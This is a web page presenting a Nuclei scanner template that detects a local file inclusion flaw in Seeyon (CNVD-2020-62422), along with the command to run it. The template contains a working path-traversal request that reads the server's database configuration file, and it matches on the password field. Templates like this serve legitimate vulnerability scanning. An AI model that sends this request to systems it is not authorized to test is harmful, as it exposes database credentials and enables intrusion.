Skip to content

Seeyon - Local File Inclusion

ID: CNVD-2020-62422

Severity: medium

Author: pikpikcu

Tags: cnvd,cnvd2020,lfi,seeyon

Seeyon is vulnerable to local file inclusion.

id: CNVD-2020-62422
info:
name: Seeyon - Local File Inclusion
author: pikpikcu
severity: medium
description: Seeyon is vulnerable to local file inclusion.
reference:
- https://blog.csdn.net/m0_46257936/article/details/113150699
metadata:
max-request: 1
tags: cnvd,cnvd2020,lfi,seeyon
http:
- method: GET
path:
- "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "application/x-msdownload"
condition: and
- type: word
part: body
words:
- "ctpDataSource.password"
condition: and
# digest: 4a0a00473045022100ea5c58ba20210db7e09d21d342c1a27ac57706d5bb33e82d7efc0f266f009d2402207dd2ef1c2d5618aa9b4ba50ff552e9dc8a8d7a144939b4e3a947a764e9bb5dc4:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cnvd/2020/CNVD-2020-62422.yaml"

View on Github